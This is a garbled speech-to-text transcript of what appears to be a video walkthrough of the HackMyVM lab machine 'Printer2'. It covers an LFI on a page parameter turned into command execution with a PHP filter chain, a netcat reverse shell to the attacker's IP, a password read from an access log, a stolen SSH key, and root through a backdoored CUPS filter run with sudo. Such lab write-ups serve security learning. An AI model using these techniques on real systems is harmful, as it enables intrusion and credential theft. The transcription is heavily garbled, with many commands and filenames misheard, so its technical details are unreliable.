Yo, what's going on, guys? In this video, we're going to be doing Printer2 from HackMyVm. This is a box written about solid and medium. And yeah, let's get on to the video. So as always, I'm server based with Mindstar. I'm here. I'm server running game that's covered Mindstar 10.0.0.1/24/height 0. Doing this, we do get the box 10.0.194. So do Control Shift Z to running map scan. So the MMI says here for default scripts, my set of information was kind of ports on the IP. Doing this, I'll do my verbose. Look at the ports today. Port 22 open for SSH, port open for HTTP. Was a port 631 open for IP. I'm sorry, visit the IP address. Look at this. Would you get a hardware store? Doesn't seem like these go to anywhere. Any of these tabs. Some do control your source code. To get this, we do get a console.log. We also do get a valid domain here. So we start by putting this into our /etc host. Some of you guys to /etc host. We'll do 10.0.0.194. Printer for life, printer.hmv. If you count our /etc host, now we do have that host name, right? So now we can visit that host name or that subdomain. We do see that this is valid, right? We can get the map scan. We do have port 22, which is open for SSH, is open as SSH for Debian. Port open for HTTP is running Apache. Port 631 open for IP and is running cups 2.3, right? So I'm gonna start by, I'll go to 10.0.0.194. What it is for 631 for IP. You do see that with this is running cups 2.33. We do have this for cups 2.3, right? So this does seem like to be a printer here. We do have the queue name for printer, so we do have a printer named as printer. But we can check this later on, right? Looking at the subdomain that we did find, at the valid subdomain, we do have HP, Canon, also Ipsen. I'm going to control your source code. And it doesn't seem to do everything under here. So I'm going to go this HP under here. Looking at the URL, we do have a page parameter. So I'm just going to do a basic LFI for /etc password. Under here, we do have a LFI. I'm going to control F, we'll do /bin/bash for root, my bell, and also for Kiera. So usually I like just opening a new tab and doing this here so I can work with that LFI, right? So we did have 3 valid users, so we'll do /bin. So we did for /bin/bash. So I'm gonna copy those users. We did have for Maybell, which I'm just gonna copy that user. I'll do this for /home Maybell. We'll check for any private keys. So we'll do .sh. We'll do ID_SA. Doesn't seem like we do have an ID_SA for Maybell. I'll do the same thing for Kiera. So copy that user. Take off Maybell. Do this for home Kiera.sh ID_SA. Does seem like we do everything under there, right? I'm also going to check for a bash_history. The reason I check this bash_history is because there can be usernames or password under the history file. So I'll do that for there. This for Maybell, so we can put that in there. Just for bash_history, and we don't have anything under there, right? Since we do have an LFI, I'm just going to go to payload all the things. I'm going to be using a PHP _filter. So if I go to file inclusion, we go to PHP _. We do have this PHP filter chain generator. So this will basically allow me to view create the chain. The chain here, in this case, they're using a PHP info, which is allowing them to display the PHP info page, right? In this case, I do want to generate a let's start by cloning this first. I do want to create a chain for, if I go to shell WordPress, go to shell.php, I do want to use the PHP system, which does let me execute commands for the parameter for CMD, right? So I'm seeding to PHP, we'll go to Python 3 for PHP _filter. We'll do mice help. So we do have an option for mice chain. So I'll go to mice chain. We did have cat this up shell WordPress, shell.php. So we're going to be calling system for PHP. So do chain, specify this in quotes. Instead of request, I do want to do this for a get. We also need to specify this for a PHP. So we'll do $PHP. Specify this for closing this out, right, for PHP. So we're just going to be chaining this, create the call to system command for get request for the CMD parameter. So now I can copy this, go into that LFI that we did have. I'm going to be pressing the AND key on my keyboard. We'll do AND. So the reason I'm specifying AND is because I'm specifying two parameters. Remember, we have the parameter for that question mark page, which was in the beginning. I can go back or to the beginning. Or if I just go back here, you'll see the idea of the page for /http password for that page parameter. This is going to be for the first parameter. If I go back to the end, you'll see that I'm going to specify the AND parameter, which is going to be for the second parameter, right? So do AND, we'll specify CMD, which is called the ID. Under here, we are under www data. So I'm just going to go to proxy, go to sends the burp. So I'm going to go to close, go to next, start burp. So I'm going to go to proxy, go to options, go to my specific address for 10.0.70. We'll do Control R. Press enter on that. Send this within repeater. We send this, and now we're under www data. So under here, I'm going to be checking for, we'll do like a which. I believe this is not going to be wrong coded, so I'll do plus which NC. We do have this for user bin NC, right? Since we do have netcat, I'm going to start by executing a bin/bash with netcat. So do netcat 10.0.070. We'll do some 9001. And we'll do -c, so we execute /bin/bash. So now we do have netcat. So I'll do Control U to your own code. I'm starting my lister now. So do unwrap netcat -vp 9001. We send this. We do ID. And downward to www data. So I'm going to start by exporting my term is equal to xterm. I'm going to run a bash -i. Doesn't seem to work. I'll do Python 3, spawn a tty. So I'll do Python 3 -c. We'll do import pty. pty.spawn. We'll execute /bin/bash. We do ID and now under www data. So I'm gonna start by doing some manual information under /opt. Under /opt, we do have a cups 2.3.3. We'll visit that later on. We'll go under /var. We'll cd into backups. Nothing under here. We'll go into var. We have www. We do have a as HTML. Images index HTML and cell CSS. Nothing under here. We see into Printer4 and we do have this axis_log. So I'm gonna cat this out. We'll cat this axis_log. Looking under here, we do see that we do have this cups is authorized. Also do have the check auth, which is authenticated as Maybell with password, this password here. So I'm just going to copy this. We'll put this into our text editor. So now we do have this password here. So I'm going to copy this. If I do run ls-myslay under /home, we do have Maybell. So run ls-myslay, we'll cat this axis_log. I'm going to grep out for password. And that does seem like that is the only password in this axis_log file. So running ls-myslay under /home, we do have this valid user. So switch use to Maybell. We do ID and now under Maybell. So check in here, we do have a private _SSH_key. If I run a follow command against this, this is a private key. So I'll cat this out. I'm going to VI into ID_same. Put that here. We'll do chmod 600 for ID_same. We'll SSH it to Maybell at 10.0.0.194 -i for ID_same. We do ID. Now under Maybell. So I'm going to start running a suite of myself. We do have the password for Maybell. It doesn't seem like you can run anything as Maybell, right? So I'm going to start by doing some information under the connections for localhost. We do have this listening for localhost on 1007, so I'm going to run netcat on 1007. In the beginning, you'll notice that it does show no need to brute force here. And here they did put a backdoor under a printer filter. And it is asking for a printer name, so I'll do this for test. And it doesn't seem like we can actually brute force since it did tell us we can't brute force, right? So you gotta wait 60 seconds for this. So under /opt, when we did do the manual enumeration, we did have this for running cups 2.3.3. There should be a filters, which each printer does have for cups. Doing some manual enumeration, if you go to roster2pog.c, if I cat this out, if I grep out for, or just do more, you will notice that under here there is a exec, and that should not be there. So I run to else my slave. If I copy this and open a new tab, if I do this for GitHub, we can actually tell the difference between both of these, right? We notice that there's no exec under here, which I don't understand why there would be exec under these printer filters, right? So now we can just run netcat again. So run netcat on 1001, put the filter name in there. And now we do have the password for, I'm guessing this could be for the next user for Kiara, I believe. So we can just copy that password. If I do /home, if I do this for Kiara, we do have the password for Kiara, we do ID, and down under Kiara. So I'm also running a sudo myself. Under here we can run a user libcups filter roster2pog. So do sudo -u runs as root. For user libcups filter roster2pog. You will notice that we did view that exec, which just allows to view commands or execute commands. If I do ID, you'll notice that we are under root now, right? So now I can just run a bash -i cd back. We do ID now under root and kind of root _flag.txt. Well, guys, for watching the video, like and subscribe, and I'll catch you guys in the next one.